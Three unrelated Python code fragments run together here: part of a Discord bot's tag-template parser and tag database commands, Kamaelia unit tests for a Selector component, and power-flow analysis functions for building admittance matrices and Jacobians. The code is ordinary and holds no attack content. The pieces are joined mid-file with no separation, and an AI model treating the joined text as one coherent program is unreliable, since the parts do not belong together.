Tag arguments elif func == "args": return " ".join(tag_args) elif func == "argslen": return str(len(tag_args)) elif func == "arg" and len(args) >= 1 and args[0].isdigit(): arg_index = int(args[0]) if arg_index < len(tag_args): return tag_args[arg_index] return "" # String functions elif func == "upper": return "|".join(args).upper() elif func == "lower": return "|".join(args).lower() elif func == "len" or func == "length": return str(len("|".join(args))) elif func == "url": return quote("|".join(args)) # Replace elif (func == "replace" or func == "replaceregex") and len(args) >= 3: # Get the pattern, in, and with args. cardinal_args = ["", "", ""] # Contains the following sequence: pattern, in, with addto = 0 for i, c in enumerate(args): if c.startswith("pattern:"): addto = 0 cardinal_args[0] += c[8:] elif c.startswith("with:"): addto = 1 cardinal_args[1] += c[5:] elif c.startswith("in:"): addto = 2 cardinal_args[2] += c[3:] else: cardinal_args[addto] += c if i == 0 else f"|{c}" # return re.sub(cardinal_args[0], cardinal_args[1], cardinal_args[2], \ # flags=re.S|re.X) \ # if func == "replaceregex" else \ # cardinal_args[2].replace(cardinal_args[0], cardinal_args[1]) return cardinal_args[2].replace(cardinal_args[0], cardinal_args[1]) # Numeric functions elif func == "math": result = 0 setr = True # This is used to set result to the first number before doing operations to it. op = 0 # Mathematic operation modes: 0=addition, 1=subtraction, 2=multiplication, 3=division, 4=modulo for arg in args: if arg.isdigit(): iarg = int(arg) if setr: result = iarg setr = False else: if op == 0: result += iarg elif op == 1: result -= iarg elif op == 2: result *= iarg elif op == 3: result /= iarg elif op == 4: result %= iarg elif arg == "+": op = 0 elif arg == "-": op = 1 elif arg == "*": op = 2 elif arg == "/": op = 3 elif arg == "%": op = 4 return str(result) # RNG functions elif func == "choose": return random.choice(args) elif func == "range" and len(args) >= 2: try: return str(random.randint(int(args[0]), int(args[1]))) except ValueError: return f"{{{full_args}}}" # Logical and memory functions elif func == "get" and args: if args[0].startswith("__"): raise Tag_Error( "Private variable, cannot start with `__`." ) return str(variables.get(args[0], '')) elif func == "if" and len(args) >= 4: # Get the values to be compared s1 = args[0] s2 = args[2] comparison = args[1] # Get the values to return then_ = "" else_ = "" add2else = False for i,c in enumerate(args[3:]): if c.startswith("then:"): add2else = False then_ += c[5:] elif c.startswith("else:"): add2else = True else_ += c[5:] else: t = f"|{c}" if add2else: else_ += t else: then_ += t # Compare s1 and s2 using comparison if comparison == "=": return then_ if s1 == s2 else else_ # elif comparison == "?": # return then_ if re.search(s2, s1) else else_ try: i1 = float(s1) i2 = float(s2) if comparison == "<": return then_ if i1 < i2 else else_ elif comparison == "<=": return then_ if i1 <= i2 else else_ elif comparison == ">": return then_ if i1 > i2 else else_ elif comparison == ">=": return then_ if i1 >= i2 else else_ elif comparison == "~": return then_ if i1 * 100 == i2 * 100 else else_ except ValueError: if comparison == "~": return then_ if s1.lower() == s2.lower() else else_ return else_ elif func in ("lattach", "lattachment", "last_attachment") \ and (len(args) == 1 and not args[0]): variables['__network_requests'] += 1 return await self.get_attachment_image(ctx, check=None) or "" elif (func == "hastebin" or func == "haste") and args[0]: variables['__network_requests'] += 1 return await self.hastebin(args[0]) elif (func == "text" or func == "download") and args[0]: variables['__network_requests'] += 1 url = f"http://{args[0]}" if not args[0].startswith('http') else args[0] return await self.get_text( url, timeout=6, proxy=True, discord_limit=True ) or "" elif func == "prefix" and (len(args) == 1 and args[0] == ""): return (await get_prefix(self.bot, ctx.message))[0][0] elif func == "substring" and len(args) >= 3: start = int(args[1]) end = int(args[2]) return args[0][start:end] elif func == "code" and args[0]: if len(args) > 1: lang = args[1] else: lang = "fix" return self.code_block("|".join(args), lang) # Rextester # always leave for last elif args and self.get_lang(func): variables['__network_requests'] += 1 r = await self.code_api(func, args[0], fmt=False) return r[0] or r[1] # Default value for unknown tag functions return f"{{{full_args}}}" # Modified 08/15/2020 to disable global tags async def get_tag(self, ctx, tag, raw=False, nsfw_check=False, return_guild=False): sql = "SELECT * FROM `tags` WHERE tag=%s AND " sql += "(guild_created=%s OR guild=%s)" args = (tag, ctx.guild.id, ctx.guild.id) q = await self.cursor.execute(sql, args) r = await q.fetchall() if raw: return r if not r: await ctx.send(f'\N{NO ENTRY} Tag "{tag}" does not exist!') return False # Either the first guild tag if len(r) > 1: r = next(x for x in r if x['guild']) # or the first "global" tag else: r = r[0] content = r['content'] if nsfw_check and (ctx.guild and r"{nsfw}" in content and not ctx.channel.is_nsfw()): raise checks.Nsfw() if return_guild: return r return content @commands.group(invoke_without_command=True, aliases=['t', 'ta', 'tags']) @commands.guild_only() @commands.cooldown(4, 2, commands.BucketType.guild) async def tag(self, ctx, txt:str, *, after:str=""): """Base command for tags, call it with a valid tag to display a tag""" content = await self.get_tag(ctx, txt) if not content: return try: parsed = await asyncio.wait_for(self.parse(ctx, content, after), timeout=30, loop=self.bot.loop) except asyncio.TimeoutError: await ctx.send('\N{WARNING SIGN} `Tag timed out...`') else: await self.send(ctx, parsed, nsfw=True) async def name_check(self, ctx, name): #owner or notsoman maintainer if not await self.bot.is_owner(ctx.author) and ctx.author.id != <PASSWORD>: if name.startswith(r'{') and name.endswith(r'}'): return await ctx.send('\N{NO ENTRY} Tag names cannot start with `{` and end with `}`.') @tag.command(name='add', aliases=['create', 'make']) @commands.guild_only() @commands.cooldown(1, 15, commands.BucketType.guild) async def tag_add(self, ctx, tag:str=None, *, txt:str=""): """Add a tag""" if tag is None: return await ctx.send("Error: Invalid Syntax\nPlease input the tags name\n`.tag add <tag_name> <--this one <tag_content>`") elif not txt and not ctx.message.attachments: return await ctx.send("Error: Invalid Syntax\nPlease input something for the tag to contain\n`.tag add <tag_name> <tag_content> <--this one`") elif len(tag) > 60: return await ctx.send("\N{NO ENTRY} `Tag name limit (<= 60).`") elif await self.name_check(ctx, tag): return sql = f"SELECT COUNT(`user`) as Count FROM `tags` WHERE user={ctx.author.id}" r = await (await self.cursor.execute(sql)).fetchone() if r['Count'] >= 5000: return await ctx.send("\N{NO ENTRY} `Tag limit reached (5000).`") for a in ctx.message.attachments: txt += f"{{attach:{a.proxy_url}}}" gid = ctx.guild and ctx.guild.id result = await self.get_tag(ctx, tag, raw=True) if not result: sql = "INSERT INTO `tags` (`user`, `tag`, `content`, `guild_created`) VALUES (%s, %s, %s, %s)" await self.cursor.execute(sql, (ctx.author.id, tag, txt, gid)) await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Tag \"{tag}\"") # elif gid and len(result) == 1 and not result[0]['guild'] \ # and result[0]['guild_created'] != gid: # sql = "INSERT INTO `tags` (`guild`, `user`, `tag`, `content`) VALUES (%s, %s, %s, %s)" # await self.cursor.execute(sql, (gid, ctx.author.id, tag, txt)) # return await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Guild Tag \"{tag}\"") else: await ctx.send(f"\N{NO ENTRY} Tag \"{tag}\" already exists!") # @tag.command(name='guildadd', aliases=['gcreate', 'gmake', 'gadd']) # @commands.guild_only() # @commands.cooldown(1, 15, commands.BucketType.guild) # async def tag_guildadd(self, ctx, tag:str=None, *, txt:str=""): # """Add a guild tag""" # if tag is None: # return await ctx.send("Error: Invalid Syntax\nPlease input the tags name\n`.tag add <tag_name> <--this one <tag_content>`") # elif not txt and not ctx.message.attachments: # return await ctx.send("Error: Invalid Syntax\nPlease input something for the tag to contain\n`.tag add <tag_name> <tag_content> <--this one`") # elif len(tag) > 60: # return await ctx.send("\N{NO ENTRY} `Tag name limit (<= 60).`") # elif await self.name_check(ctx, tag): # return # for a in ctx.message.attachments: # txt += f"{{attach:{a.proxy_url}}}" # gid = ctx.guild.id # sql = "SELECT tag FROM `tags` WHERE tag=%s AND (guild=%s OR guild_created=%s)" # q = await self.cursor.execute(sql, (tag, gid, gid)) # if await q.fetchone(): # return await ctx.send(f"\N{NO ENTRY} Tag \"{tag}\" already exists!") # sql = "INSERT INTO `tags` (`guild`, `user`, `tag`, `content`) VALUES (%s, %s, %s, %s)" # await self.cursor.execute(sql, (gid, ctx.author.id, tag, txt)) # return await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Guild Tag \"{tag}\"") async def remove_global_tag(self, ctx, tag): sql = "SELECT tag FROM `tags` WHERE tag=%s AND user=%s AND guild_created=%s" args = (tag, ctx.author.id, ctx.guild.id) q = await self.cursor.execute(sql, args) if not await q.fetchone(): await ctx.send(f"\N{CROSS MARK} Tag \"{tag}\" does not exist or you don't own it!") else: sql = "DELETE FROM `tags` WHERE tag=%s AND user=%s AND guild_created=%s" await self.cursor.execute(sql, args) await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Removed Tag \"{tag}\"") @tag.group(name='remove', aliases=['delete'], invoke_without_command=True) @commands.guild_only() @commands.cooldown(2, 5, commands.BucketType.user) async def tag_remove(self, ctx, *, txt:str=None): """"Remove a tag you own""" if txt
<reponame>sparkslabs/kamaelia_orig<filename>Sketches/MPS/BugReports/FixTests/Kamaelia/Test/Internet/test_Selector.py #!/usr/bin/python # -*- coding: utf-8 -*- # Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1) # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://www.kamaelia.org/AUTHORS - please extend this file, # not this notice. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import sys; sys.path.append("../") import Kamaelia.Internet.Selector as SELECTORMODULE from Kamaelia.Internet.Selector import Selector import Axon from Axon.Ipc import shutdown from Kamaelia.IPC import newReader, removeReader, newWriter, removeWriter, newExceptional, removeExceptional class SmokeTests_Selector(unittest.TestCase): def test_SmokeTest(self): """__init__ - Called with no arguments succeeds""" S = Selector() self.assert_(isinstance(S, Axon.Component.component)) def test_RunsForever(self): """main - Run with no messages, keeps running""" S = Selector() S.activate() for i in xrange(1,100): try: S.next() except StopIteration: self.fail("Component should run until told to stop. Failed on iteration: "+str(i)) def test_PausesUntilFirstMessage(self): """main - Before we recieve any messages telling us what to watch for, the system should pause and yield""" S = Selector() S.activate() V = S.next() self.assert_(S._isRunnable() is not True) def test_shutdownMessageCausesShutdown(self): """main - If the component recieves a shutdown() message, the component shuts down""" S = Selector() S.activate() S._deliver(shutdown(),"control") componentExit = False for i in xrange(2000): try: S.next() except StopIteration: componentExit = True break if not componentExit: self.fail("When sent a shutdown message, the component should shutdown") class MockSelect: """This is needed because we need to test that select is being used correctly""" def __init__(self, results=None): self.log = [] self.results = results # We're using this simply as a namespace. def select(self,*args): self.log.append(("select", args)) readers,writers, excepts, timeout = args if self.results is not None: try: result = self.results[0] del self.results[0] return result except IndexError: return [],[],[] else: return readers,writers, excepts def addResults(self, results): self.results.extend(results) class Readables_Selector(unittest.TestCase): def test_SelectIsMockable(self): "main - The module uses select, and that is externally mockable" try: SELECTORMODULE.select except AttributeError: self.fail("Should import the select module") def test_SendingAReadableMessageResultsInItBeingSelectedAgainst(self): "main - If we send a newReader message to the notify inbox, it results in the selectable reader being selected on in the readers set" MOCKSELECTORMODULE = MockSelect() SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() dummyservice = (Axon.Component.component(), "inbox") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS")),"notify") for i in xrange(100): S.next() func, args = MOCKSELECTORMODULE.log[0] self.assertEqual("select", func, "select was called in the main loop") self.assertEqual(["LOOKINGFORTHIS"], args[0], "The selectable was added to the list of readables") self.assertEqual([], args[1], "Writable set should be empty") self.assertEqual([], args[2], "Exception set should be empty") self.assertEqual(0, args[3], "The select should be non-blocking") def test_WeSendTheSelectorAServiceAndSelectableOnlySelectsTheSelectable(self): "main - When we send the newReader message, it also includes a service upon which the selector can talk back to us. The selector only selects on the selectable part of the newReader message" MOCKSELECTORMODULE = MockSelect() SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() dummyservice = (Axon.Component.component(), "inbox") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify") for i in xrange(100): S.next() func, args = MOCKSELECTORMODULE.log[0] self.assertEqual("select", func, "select was called in the main loop") self.assertEqual(["LOOKINGFORTHIS"], args[0])#, "The selectable was added to the list of readables") self.assertEqual([], args[1], "Writable set should be empty") self.assertEqual([], args[2], "Exception set should be empty") self.assertEqual(0, args[3], "The select should be non-blocking") def test_SendingMultipleReadersResultsInAllSelected(self): "main - Sending multiple newReader messages results in all being select()ed" MOCKSELECTORMODULE = MockSelect() SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() dummyservice = (Axon.Component.component(), "inbox") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHISTOO") ),"notify") S._deliver(newReader(S,( dummyservice, "LOOKINGFORANDTHIS") ),"notify") for i in xrange(100): S.next() lastfunc, lastargs = None, None i = 0 func, args = MOCKSELECTORMODULE.log[i] while not( (lastfunc, lastargs) == (func, args)): # Search for quiescent state i = i + 1 lastfunc, lastargs = func, args func, args = MOCKSELECTORMODULE.log[i] self.assertEqual("select", func, "select was called in the main loop") self.assertEqual(["LOOKINGFORTHIS","LOOKINGFORTHISTOO","LOOKINGFORANDTHIS"], args[0])#, "The selectable was added to the list of readables") def test_ActivityOnReaderResultsInMessageOnReadersService(self): "main - Activity on the selectable results in a message appearing in the service provided to the selector" MOCKSELECTORMODULE = MockSelect() SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() D = Axon.Component.component() dummyservice = (D, "inbox") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify") for i in xrange(100): S.next(); try: S.postoffice.next() except: pass self.assert_(not ( len(D.inboxes["inbox"]) == 0 ) ) selectable = D.recv("inbox") self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for") def test_ActivityOnAnyReaderResultsInMessageOnThatReadersService(self): "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable" MOCKSELECTORMODULE = MockSelect(results=[ (["LOOKINGFORTHIS"],[],[]), (["THENFORTHIS"],[],[]), (["ANDTHENFORTHIS"],[],[]) ]) SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() D = Axon.Component.component() E = Axon.Component.component() F = Axon.Component.component() dummyservice1 = (D, "inbox") S._deliver(newReader(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify") dummyservice2 = (E, "inbox") S._deliver(newReader(S,( dummyservice2, "THENFORTHIS") ),"notify") dummyservice3 = (F, "inbox") S._deliver(newReader(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify") for i in xrange(100): S.next(); try: S.postoffice.next() except: pass selectable = D.recv("inbox") self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = E.recv("inbox") self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = F.recv("inbox") self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for") def test_RemoveReader_ResultsInReaderNoLongerBeingSelectedOrWiredIn(self): "main - Sending a remove reader message unwires/links a component, and also removes it's selectable from the readers list" MOCKSELECTORMODULE = MockSelect(results=[ ([], [], [] )]) SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() D = Axon.Component.component() dummyservice = (D, "inbox") S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify") S._deliver(removeReader(S,"LOOKINGFORTHIS"),"notify") for i in xrange(100): S.next(); try: S.postoffice.next() except: pass self.assert_( len(D.inboxes["inbox"]) == 0 ) def test_ActivityOnAnyWriterResultsInMessageOnThatWritersService(self): "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable" MOCKSELECTORMODULE = MockSelect(results=[ ([],["LOOKINGFORTHIS"],[]), ([],["THENFORTHIS"],[]), ([],["ANDTHENFORTHIS"],[]) ]) SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() D = Axon.Component.component() E = Axon.Component.component() F = Axon.Component.component() dummyservice1 = (D, "inbox") S._deliver(newWriter(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify") dummyservice2 = (E, "inbox") S._deliver(newWriter(S,( dummyservice2, "THENFORTHIS") ),"notify") dummyservice3 = (F, "inbox") S._deliver(newWriter(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify") for i in xrange(100): S.next(); try: S.postoffice.next() except: pass selectable = D.recv("inbox") self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = E.recv("inbox") self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = F.recv("inbox") self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for") def test_RemoveWriter_ResultsInWriterNoLongerBeingSelectedOrWiredIn(self): "main - Sending a remove writer message unwires/links a component, and also removes it's selectable from the writers list" MOCKSELECTORMODULE = MockSelect(results=[ ([], [], [] )]) SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(100): S.next() D = Axon.Component.component() dummyservice = (D, "inbox") S._deliver(newWriter(S,( dummyservice, "LOOKINGFORTHIS") ),"notify") S._deliver(removeWriter(S,"LOOKINGFORTHIS"),"notify") for i in xrange(100): S.next(); try: S.postoffice.next() except: pass print self.assert_( len(D.inboxes["inbox"]) == 0 ) def test_ActivityOnAnyExceptionalResultsInMessageOnThatExceptionalsService(self): "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable" MOCKSELECTORMODULE = MockSelect(results=[ ([],[],["LOOKINGFORTHIS"]), ([],[],["THENFORTHIS"]), ([],[],["ANDTHENFORTHIS"]) ]) SELECTORMODULE.select = MOCKSELECTORMODULE S = Selector() S.activate() for i in xrange(5): S.next() D = Axon.Component.component() E = Axon.Component.component() F = Axon.Component.component() dummyservice1 = (D, "inbox") S._deliver(newExceptional(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify") dummyservice2 = (E, "inbox") S._deliver(newExceptional(S,( dummyservice2, "THENFORTHIS") ),"notify") dummyservice3 = (F, "inbox") S._deliver(newExceptional(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify") for i in xrange(5): S.next(); try: S.postoffice.next() except: pass selectable = D.recv("inbox") self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = E.recv("inbox") self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for") selectable = F.recv("inbox") self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for") def test_RemoveExceptional_ResultsInExceptionalNoLongerBeingSelectedOrWiredIn(self): "main - Sending a remove exceptional
""" Power Flow Analysis: Support Functions Created By: <NAME> <NAME> """ import numpy as np from numpy.linalg import inv import pandas as pd """ Imports Bus and line data from excel sheets Takes in an array containing ['File Location', 'Sheet Name'] Returns two panda data frames for the bus and line data """ def import_BusAndLineData(BusData_Location, LineData_Location): BusData = pd.read_excel(BusData_Location[0], sheet_name=BusData_Location[1]) LineData = pd.read_excel(LineData_Location[0], sheet_name=LineData_Location[1]) return BusData, LineData """ Builds G and B matrices to be used in Power Flow calculations Takes in data frame containing all line information, and number of busses in system Returns G and B arrays """ def build_AdmittanceMatrix(LineData, sys_Size): col = np.array(LineData.columns) line_From = np.array(LineData[col[0]]) line_To = np.array(LineData[col[1]]) line_R = np.array(LineData[col[2]]) line_X = np.array(LineData[col[3]]) line_Z = np.array(LineData[col[2]]) + 1j*np.array(LineData[col[3]]) line_Y = 1/line_Z line_B = np.array(LineData[col[4]]) line_Fmax = np.array(LineData[col[5]]) sys_Y = np.array([[0 for j in range(sys_Size)] for i in range(sys_Size)], dtype = complex) sys_G = np.zeros((sys_Size, sys_Size)) sys_B = np.zeros((sys_Size, sys_Size)) #X_ij for i in range(sys_Size): #Row for j in range(sys_Size): #Column if i==j: # Diagonal, sum of Y(From==i || To==i) + .5B(From==i || To ==i) sys_Y[i][j] = np.sum(line_Y[np.array(line_From==i+1) + np.array(line_To==i+1)]) \ +.5j*np.sum(line_B[np.array(line_From==i+1) + np.array(line_To==i+1)]) elif i<j: #Non Diagonal, -Y(From==i && To==j) sys_Y[i][j] = -np.sum(line_Y[np.multiply(np.array(line_From==i+1), np.array(line_To==j+1))]) else: #i>j =[j][i] sys_Y[i][j] = sys_Y[j][i] sys_G = sys_Y.real sys_B = sys_Y.imag return sys_Y, sys_G, sys_B """ Parses intial bus information from data Takes in Bus Data data frame Returns sys_: LoadP - active power consumed at node LoadQ - reactive power consumed at node BusType - type of bus<(S)lack, (G)enerator, (D)rain> PGen - Active Power produced by each generator node VRef - Reference voltages at PV busses """ def init_BusData(BusData): col = np.array(BusData.columns) sys_BusNum = np.array(BusData[col[0]]) sys_LoadP = np.array(BusData[col[1]]) sys_LoadQ = np.array(BusData[col[2]]) sys_BusType = np.array(BusData[col[3]]) sys_PGen = np.array(BusData[col[4]]) sys_VRef = np.array(BusData[col[5]]) return sys_BusNum, sys_LoadP, sys_LoadQ, sys_BusType, sys_PGen, sys_VRef """ Initializes System Data for processing Takes in sys_: LoadP - active power consumed at node LoadQ - reactive power consumed at node BusType - type of bus<(S)lack, (G)enerator, (D)rain> PGen - Active Power produced by each generator node VRef - Reference voltages at PV busses Returns a 2D array containing each buses's current information [i,:] - Bus i's information [:,0] - Bus # [:,1] - Voltage (V) [:,2] - Angle (T) [:,3] - Active Power (P_inj) [:,4] - P(T,V)-P_inj (mismatch) [:,5] - Reactive Power (Q_inj) [:,6] - Q(T,V)-Q_inj (mismatch) """ def init_SysData(sys_BusNum, sys_LoadP, sys_LoadQ, sys_BusType, sys_PGen, sys_VRef, sys_G, sys_B, S_Base): n= sys_LoadP.size sys_Data = np.zeros((n,7)) sys_Data[:,0] = sys_BusNum sys_Data[:,1] = sys_VRef #Sets initial voltages to provided reference sys_Data[:,2] = np.zeros(n) #Sets initial angles to zero sys_Data[:,3] = (sys_PGen-sys_LoadP)/S_Base #Sets initial power inject to Bus generation minus load in per unit sys_Data[sys_BusType=='S',3] = (np.sum(sys_LoadP)-np.sum(sys_PGen))/S_Base #Sets initial guess for active power required from slack bus sys_Data[:,5] = (-sys_LoadQ)/S_Base #Sets initial power inject to Bus generation minus load in per unit sys_Data[sys_BusType=='S',5] = (-np.sum(sys_LoadQ))/S_Base #Sets initial guess for reactive power required from slack bus for i in range(n): #Sets initial mismatch to calculated power from (V,T) minus expected inject sys_Data[i,4] = -sys_Data[i,3] sys_Data[i,6] = -sys_Data[i,5] for j in range(n): sys_Data[i,4] += sys_Data[i,1]*sys_Data[j,1]*\ (sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2])+\ sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2])) sys_Data[i,6] += sys_Data[i,1]*sys_Data[j,1]*\ (sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2])-\ sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2])) return sys_Data """ Determines Jacobian value for a given J_11 cell (dP/dT) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_11(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = -Q_i - B_ij*(V_i**2) else: J_ij = V_i*V_j*(G_ij*np.sin(T_i-T_j)-B_ij*np.cos(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_12 cell (dP/dV) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_12(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = (P_i/V_i) + G_ij*V_i else: J_ij = V_i*(G_ij*np.cos(T_i-T_j)+B_ij*np.sin(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_21 cell (dQ/dT) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_21(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = P_i-G_ij*(V_i**2) else: J_ij = -V_i*V_j*(G_ij*np.cos(T_i-T_j)+B_ij*np.sin(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_22 cell (dQ/dV) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_22(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = (Q_i/V_i)-B_ij*V_i else: J_ij = V_i*(G_ij*np.sin(T_i-T_j)-B_ij*np.cos(T_i-T_j)) return J_ij """ Processes 1 iteration of current system data Takes in sys_Data, a 2D array containing each node's current information [0] - Bus # [1] - Voltage (V) [2] - Angle (T) [3] - Active Power (P_inj) [4] - P(T,V)-P_inj (mismatch) [5] - Reactive Power (Q_inj) [6] - Q(T,V)-Q_inj (mismatch) As well as, the systems G and B matrices, and node types Returns the updated array """ def update_SysData(sys_Data, sys_G, sys_B, sys_BusType): n = sys_BusType.size D_index = sys_BusType=='D' G_index = sys_BusType=='G' S_index = sys_BusType=='S' """Determine Jacobian""" J = np.zeros((2*n,2*n)) for i in range(n): for j in range(n): #(i, j, V_i, V_j, T_i, T_j, P_i(T,V), Q_i(T,V), G_ij, B_ij) J[i,j] = Jacobian_PowerFlow_11(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i,j+n] = Jacobian_PowerFlow_12(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i+n,j] = Jacobian_PowerFlow_21(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i+n,j+n] =Jacobian_PowerFlow_22(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) """Remove non-implicit values""" for i in range(n-1,-1,-1): if S_index[i]: J=np.delete(J, i+n, 0) J=np.delete(J, i+n, 1) J=np.delete(J, i, 0) J=np.delete(J, i, 1) elif G_index[i]: J=np.delete(J, i+n, 0) J=np.delete(J, i+n, 1) """Determine Inverse""" J_inv = inv(J) """Determine Delta T,V""" PQ = np.concatenate((sys_Data[np.invert(S_index), 4], sys_Data[D_index, 6])) Delta = -J_inv @ PQ Delta_T = Delta[0:sum(np.invert(S_index))] Delta_V = Delta[sum(np.invert(S_index)):sum(np.invert(S_index))+sum(D_index)] """Update T for non-slack buses, and V for PQ buses""" Delta_T_index = 0 Delta_V_index = 0 for i in range(n): if G_index[i]: sys_Data[i,2] += Delta_T[Delta_T_index] Delta_T_index += 1 elif D_index[i]: sys_Data[i,1] += Delta_V[Delta_V_index] Delta_V_index += 1 sys_Data[i,2] += Delta_T[Delta_T_index] Delta_T_index += 1 """Update P_inj for slack bus, and Q_inj for non PQ buses""" for i in range(n): if S_index[i]:#Update Slack P_inj sys_Data[i,3] = 0 if (S_index[i] or G_index[i]):#Update non PQ Q_inj sys_Data[i,5] = 0 for j in range(n): if S_index[i]:#Update Slack sys_Data[i,3] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))+(sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))) if (S_index[i] or G_index[i]):#Update non PQ sys_Data[i,5] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))-(sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))) """Update mismatch columns""" for i in range(n): sys_Data[i,4] = -sys_Data[i,3] sys_Data[i,6] = -sys_Data[i,5] for j in range(n): sys_Data[i,4] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))+(sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))) sys_Data[i,6] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))-(sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))) return sys_Data """ Takes in voltage and theta values, shunt capacitance, and the admittance matrix Returns Power Values: S_ij - Apparent Power P_ij - Real Power Q_ij - Reactive Power """ def PowerFlow (V_i,T_i,V_j,T_j,B_tot,y_ij): I_ij = y_ij * (V_i * np.cos(T_i) + 1j * V_i * np.sin(T_i) - V_j * np.cos(T_j) - 1j * V_j * np.sin(T_j)) + (1j*B_tot / 2) * (V_i * np.cos(T_i) + 1j * V_i * np.sin(T_i)) S_ij = (V_i*np.cos(T_i)+1j*V_i*np.sin(T_i)) * (I_ij.conjugate()) return abs(S_ij), S_ij.real, S_ij.imag """ Takes in matrices sys_Data, LineData, and sys_Y Returns lists: i Bus # (i_buses) j Bus # 